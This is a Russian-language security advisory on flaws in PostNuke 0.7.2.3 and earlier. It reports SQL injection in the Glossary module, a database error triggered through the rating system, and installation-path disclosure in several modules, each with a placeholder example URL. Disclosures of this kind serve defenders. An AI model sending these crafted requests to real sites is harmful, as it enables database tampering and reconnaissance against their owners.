Несколько уязвимостей обнаружено в PostNuke. Удаленный пользователь может выполнить DoS нападение против связанной базы данных и внедрить произвольные SQL команды. Также удаленный пользователь может определить инсталляционный путь. 

Сообщается, что модуль Glossary не фильтрует данные, представленные пользователем в переменной
page. В результате удаленный пользователь может сконструировать URL, который выполнит произвольные SQL команды на основной базе данных. Пример: 

http://[TARGET]/modules.php?op=modload&name=Glossary&file=index&
page=`[HERE COMES YOUR RANDOM DATA OR SQL QUERY]

Также сообщается, что системе рейтинга не проверяет значения рейтинга, представленные пользователем. Удаленный пользователь может представить случайные символы в поле рейтинга, чтобы вызвать ошибку на связанной базе данных. Пример: 

http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=
addrating&ratinglid=[DOWNLOADID]

&ratinguser=[REMOTE USER]&ratinghost_name= [REMOTE HOST;-)] &rating=[YOUR RANDOM CONTENT]

Также сообщается, что модули Downloads и 'WebLinks раскрывают инсталляционный путь удаленному пользователю. Пример: 

http://[TARGET]/modules.php?op=modload&name= Downloads&file=index&req=viewdownloaddetails&
lid=[RANDOM NUMERIC CONTENT]

http://[TARGET]/modules.php?op=modload&name= Downloads&file=index&req=viewdownloadcomments&
lid=[RANDOM NUMERIC CONTENT]

http://[TARGET]/modules.php?op=modload&name= Downloads&file=index&req=viewdownloadeditorial&
lid=[RANDOM NUMERIC CONTENT]

http://[TARGET]/modules.php?op=mod load&name= Downloads&file=index&req=brokendownload&
lid=[RANDOM NUMERIC CONTENT]

http://[TARGET]/modules.php?op=modload&name= Downloads&file=index&req=outsidedownloadsetup
&lid=[RANDOM NUMERIC CONTENT]

Модуль Sections также раскрывает инсталляционный путь удаленному пользователю. Пример: 

http://[TARGET]/modules.php?op=modload&name= Sections&file=index&req=listarticles&secid=
[BLANK]

http://[TARGET]/modules.php?op=modload&name= Sections&file=index&req=listarticles&secid=
[RANDOM CONTENT]

http://[TARGET]/modules.php?op=modload&name= Sections&file=index&req=viewarticle&artid=
[BLANK]

http://[ TARGET]/modules.php?op=modload&name= Sections&file=index&req=viewarticle&artid=
[RANDOM CONTENT]

Модуль FAQ также раскрывает инсталляционный путь удаленному пользователю. Пример: 

http://[TARGET]/modules.php?op=modload&name=FAQ &file=index&myfaq=yes&id_cat=`
[RANDOM CHARACTERS]

Секция Reviews также раскрывает инсталляционный путь удаленному пользователю. Пример: 

http://[TARGET]/modules.php?op=modload&name=Reviews &file=index&req=showcontent&id=`[RANDOM] 

Уязвимость обнаружена в PostNuke 0.7.2.3 and prior versions
(0.7.x.x).

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии